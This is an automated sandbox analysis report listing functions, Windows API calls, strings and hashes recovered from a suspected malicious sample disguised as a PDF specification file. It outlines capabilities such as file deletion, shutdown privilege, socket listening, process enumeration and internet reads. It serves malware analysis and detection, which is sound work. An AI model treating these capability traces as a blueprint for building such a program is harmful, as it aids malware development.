                                      • Opcode Fuzzy Hash: 7553b180d67da6ea4086656c7127005218c591f5bbfdae75ef020e9ba8afed49
                                      • Instruction Fuzzy Hash: 4C615A725043059FDB15EF60C84599EB3E8FF89314F04891AF989DB252DB31EA45CB92
                                      Function 00347D19 Relevance: 14.7, Strings: 11, Instructions: 962COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                      • API String ID: 0-2023335898
                                      • Opcode ID: 0914caa1ca2de617f93f3dab6d81964ae14d9c0b8108fa00519c8db60e02c8ea
                                      • Instruction ID: 1dfe9c3a63647fbf643f2e0307fb4fa64be34248bd9421694f1038f40246ff0b
                                      • Opcode Fuzzy Hash: 0914caa1ca2de617f93f3dab6d81964ae14d9c0b8108fa00519c8db60e02c8ea
                                      • Instruction Fuzzy Hash: 8282C071D04219CFCB26CF98C8807EDBBB5BF44314F2681A9D959AB751E730AE85CB90
                                      Function 00396D07 Relevance: 13.6, APIs: 9, Instructions: 83clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 1d4ffac07129bada24e1a644a4e7cdedb9801943f2c124da609e2562d323624f
                                      • Instruction ID: 262c0081097a17ecfe95b50cd07c9c4051f297e8aaf256c4022e34688dbbbfd5
                                      • Opcode Fuzzy Hash: 1d4ffac07129bada24e1a644a4e7cdedb9801943f2c124da609e2562d323624f
                                      • Instruction Fuzzy Hash: 40215A31301210AFDB13AF64DD4AF6E77A8EF44711F05842AF95ADB2A1DB30E911CB54
                                      Function 003863F9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00385FA6,?), ref: 00386ED8
                                        • Part of subcall function 003872CB: GetFileAttributesW.KERNEL32(?,00386019), ref: 003872CC
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00386474
                                      • DeleteFileW.KERNEL32(?), ref: 003864DA
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003864EB
                                      • FindClose.KERNEL32(00000000), ref: 00386506
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: File$Find$AttributesCloseDeleteFirstFullNameNextPath
                                      • String ID: \*.*$p1Kw`KLw
                                      • API String ID: 1127339523-1688704836
                                      • Opcode ID: 506ec71ff2a8b747783d5648882317ca921573efef0727765af6ee3694a25892
                                      • Instruction ID: 9a1facd701b6afc5db46735b1db745ffc9dc37f39e21a0e07f5ac346c2443e5e
                                      • Opcode Fuzzy Hash: 506ec71ff2a8b747783d5648882317ca921573efef0727765af6ee3694a25892
                                      • Instruction Fuzzy Hash: 393184B24083849EC722EBA48886DDFB7DCAF56310F44496EF6D8C7141EA35E50D8767
                                      Function 003879D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0037B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                        • Part of subcall function 0037B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                        • Part of subcall function 0037B134: GetLastError.KERNEL32 ref: 0037B1BA
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00387A0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-194228
                                      • Opcode ID: 63d02b08e188c1150c0b2c808fc6cb8c05a015e037f9f16ef9a676f342f669dc
                                      • Instruction ID: 546218665d2453d73a47970211b6169efe9b2c7507e1f5baed10797f8645093c
                                      • Opcode Fuzzy Hash: 63d02b08e188c1150c0b2c808fc6cb8c05a015e037f9f16ef9a676f342f669dc
                                      • Instruction Fuzzy Hash: DD01B5716583116AE72E3664CC8ABBE725D9700340F3504A4FD03E21C1D669DE0083B4
                                      Function 00398C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00398CA8
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398CB7
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00398CD3
                                      • listen.WSOCK32(00000000,00000005), ref: 00398CE2
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398CFC
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00398D10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                      • String ID:
                                      • API String ID: 1279440585-0
                                      • Opcode ID: 8c10b134de8d30b0422881a0d44fb6fd6b3fd6f2cada31b2c0d217566dd0985b
                                      • Instruction ID: 889cbc4d916eedb90dabb0599fa07347609df62e5d02ee9fd4a75f28d12162ec
                                      • Opcode Fuzzy Hash: 8c10b134de8d30b0422881a0d44fb6fd6b3fd6f2cada31b2c0d217566dd0985b
                                      • Instruction Fuzzy Hash: 3321B1316002009FCB12EF68CD45F6EB7E9EF89720F118558F956EB2E2CB70AD418B61
                                      Function 0039C18C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 232COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00379ABF: CLSIDFromProgID.OLE32 ref: 00379ADC
                                        • Part of subcall function 00379ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00379AF7
                                        • Part of subcall function 00379ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00379B05
                                        • Part of subcall function 00379ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00379B15
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0039C235
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0039C38C
                                      • CoTaskMemFree.OLE32(?), ref: 0039C397
                                      Strings
                                      • NULL Pointer assignment, xrefs: 0039C3E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 4175897753-2785691316
                                      • Opcode ID: 016e7cacdb43f6cc02be6f06808fd43e46f7a3855c62df9b5c7aa5bcd305244f
                                      • Instruction ID: b3dc16d3ccadd1fede2f28ceed1c5852d7b00d9c3602202930b6e2a183a88389
                                      • Opcode Fuzzy Hash: 016e7cacdb43f6cc02be6f06808fd43e46f7a3855c62df9b5c7aa5bcd305244f
                                      • Instruction Fuzzy Hash: FA913E71D10218ABDF12DF95DC91EEEBBB8EF04710F10816AF519AB291DB706A45CFA0
                                      Function 003813CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003813DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($,2?$<2?$|
                                      • API String ID: 1659193697-3385512009
                                      • Opcode ID: b046f05b95574edafdbc654e5b69ef21e6983eff3c4fcf80fa28c7e5a868fc0f
                                      • Instruction ID: 7bb2461deb0c6f4248ccfa2e61f8195f5b6fa2c75bfd4ea49f0691353aaf0caa
                                      • Opcode Fuzzy Hash: b046f05b95574edafdbc654e5b69ef21e6983eff3c4fcf80fa28c7e5a868fc0f
                                      • Instruction Fuzzy Hash: A5323675A007059FC729DF69C48196AB7F4FF48320B12C4AEE59ADB3A1E770E942CB44
                                      Function 0039923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0039A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00399296
                                      • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003992B9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLastinet_addrsocket
                                      • String ID:
                                      • API String ID: 4170576061-0
                                      • Opcode ID: b444de2d1865ff0c523010433b6cec23d669d5c4c7109676b903836b0505f65d
                                      • Instruction ID: 4978d68f6583b19c1e5e04f8a27cefa290613f78835a6650d6d1f21d57b11e0b
                                      • Opcode Fuzzy Hash: b444de2d1865ff0c523010433b6cec23d669d5c4c7109676b903836b0505f65d
                                      • Instruction Fuzzy Hash: 3741AE70600204AFDB12AF68C882F7E77EDEF44724F14455DF956AF2A2DB74AE018B91
                                      Function 003A8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: 2604368930a8db8a01bce76ebaf58a591b405e278971ea31eb301b6aa44bb506
                                      • Instruction ID: 132bddfedb8d78186be859a1ec20cd631fe37b1a70cdf355c04560d71a2ac0ce
                                      • Opcode Fuzzy Hash: 2604368930a8db8a01bce76ebaf58a591b405e278971ea31eb301b6aa44bb506
                                      • Instruction Fuzzy Hash: 9511BC313002116FE7232F26DC84E6FBB9CEF86760F450429F84ADB291CF30E90286A4
                                      Function 003779C9 Relevance: 7.1, Strings: 5, Instructions: 875COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )k7$1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 0-2626400329
                                      • Opcode ID: ac48a10249df2e92790f1a5bab84cd8aecd37b62b8fe3a714232c303f9d0bf73
                                      • Instruction ID: d15472ea962f9e2c0224006e7e8fa4941581c440c8fcc6c677279807600474bb
                                      • Opcode Fuzzy Hash: ac48a10249df2e92790f1a5bab84cd8aecd37b62b8fe3a714232c303f9d0bf73
                                      • Instruction Fuzzy Hash: 0E626E75E0465A8BDF26CFA8C8402EDFBB1FF58310F65816AD859EB341D7789942CB80
                                      Function 003665C4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 94COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003665DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FeaturePresentProcessor
                                      • String ID: Genu$ineI$ntel
                                      • API String ID: 2325560087-3389352399
                                      • Opcode ID: b2e2eeaf2ec658a25446932a355b03164cb4108c909658d4d9d765ddb18faaf2
                                      • Instruction ID: 1a9d306a2deb6579d9fff79be139810a5a45275fdb07376a80e880c09b81540b
                                      • Opcode Fuzzy Hash: b2e2eeaf2ec658a25446932a355b03164cb4108c909658d4d9d765ddb18faaf2
                                      • Instruction Fuzzy Hash: BA31B8B2C09716DBDB258F69E98A22AFBB4FB40355F11C53EE419EB254C375A850CF80
                                      Function 0035E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0035E014,774B0AE0,0035DEF1,003DDC38,?,?), ref: 0035E02C
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0035E03E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                      • API String ID: 2574300362-192647395
                                      • Opcode ID: 757597f7d477094613d61b0fff64616c5e2de454c28f06c489d66185673b5108
                                      • Instruction ID: 9994c6dd4d99242e31d3ecf5f6f2bcd63bc45a70a96ce64d326666b9d595b48b
                                      • Opcode Fuzzy Hash: 757597f7d477094613d61b0fff64616c5e2de454c28f06c489d66185673b5108
                                      • Instruction Fuzzy Hash: 37D0A732800712DFC7374F61EC08E7376D8AB10301F2D4429F882D31A0D7B4D8848750
                                      Function 00386532 Relevance: 6.1, APIs: 4, Instructions: 71processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00386554
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00386564
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00386583
                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003865F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 7ef89de9cdbfa4f3659e82b6facc5558fc0e9d9c1f64d8124b84814f8cab9d6e
                                      • Instruction ID: 4554f64c8dc4530dc9a96716584d2f19eb124e785e456ac47c651b79fcb1122c
                                      • Opcode Fuzzy Hash: 7ef89de9cdbfa4f3659e82b6facc5558fc0e9d9c1f64d8124b84814f8cab9d6e
                                      • Instruction Fuzzy Hash: BA216271900218ABDB12BBA4CD89FEEB7BCAB49300F5004E9F505E7145EB71AF85CB60
                                      Function 0035B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 0035B22F
                                        • Part of subcall function 0035B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0035B5A5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Proc$LongWindow
                                      • String ID:
                                      • API String ID: 2749884682-0
                                      • Opcode ID: b457d04d4561c5720f695212eb99c867cf91832c2f2d29306ad3c78df80dfd2a
                                      • Instruction ID: feda2bfcc857351bb1baf153f799470235cbaaba1caa10447ac277056fd96716
                                      • Opcode Fuzzy Hash: b457d04d4561c5720f695212eb99c867cf91832c2f2d29306ad3c78df80dfd2a
                                      • Instruction Fuzzy Hash: 00A15B70114005BADB3B6F2E4C89EFFA95CEB4234AF11492DFD01EADB1CB259D099672
                                      Function 00394EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003943BF,00000000), ref: 00394FA6
                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00394FD2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataFileQueryRead
                                      • String ID:
                                      • API String ID: 599397726-0
                                      • Opcode ID: 51f033dd84e6fee1370ad8d359166d48eacb48bdf60d8c5db23f7fc0266f1dce
                                      • Instruction ID: 2dac383d3b9351cb3e78b6beaf96d6b865f354804ad279e64c166db48c920db1
                                      • Opcode Fuzzy Hash: 51f033dd84e6fee1370ad8d359166d48eacb48bdf60d8c5db23f7fc0266f1dce
                                      • Instruction Fuzzy Hash: 6541C77150460ABFEF239F94DC85EBFB7BCEB40754F10406EF606A6181EA719E4297A0
                                      Function 0038EB60 Relevance: 4.6, APIs: 3, Instructions: 125fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0038EB8A
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0038EBE0
                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0038EC0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: 8a225064de2162a2a65518aa4079735a89bef32f2b3f784d8071897eeb28b9b5
                                      • Instruction ID: 1e5cfc3a5b6b76536c7fbb156b7366537efda2d994c73a91a5f63cc95b00db8c
                                      • Opcode Fuzzy Hash: 8a225064de2162a2a65518aa4079735a89bef32f2b3f784d8071897eeb28b9b5
                                      • Instruction Fuzzy Hash: CD41AD356043018FC71AEF28C491E9AB3E8FF4A324F10459DFA5A8B3A1DB31B944CB91
                                      Function 0038E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
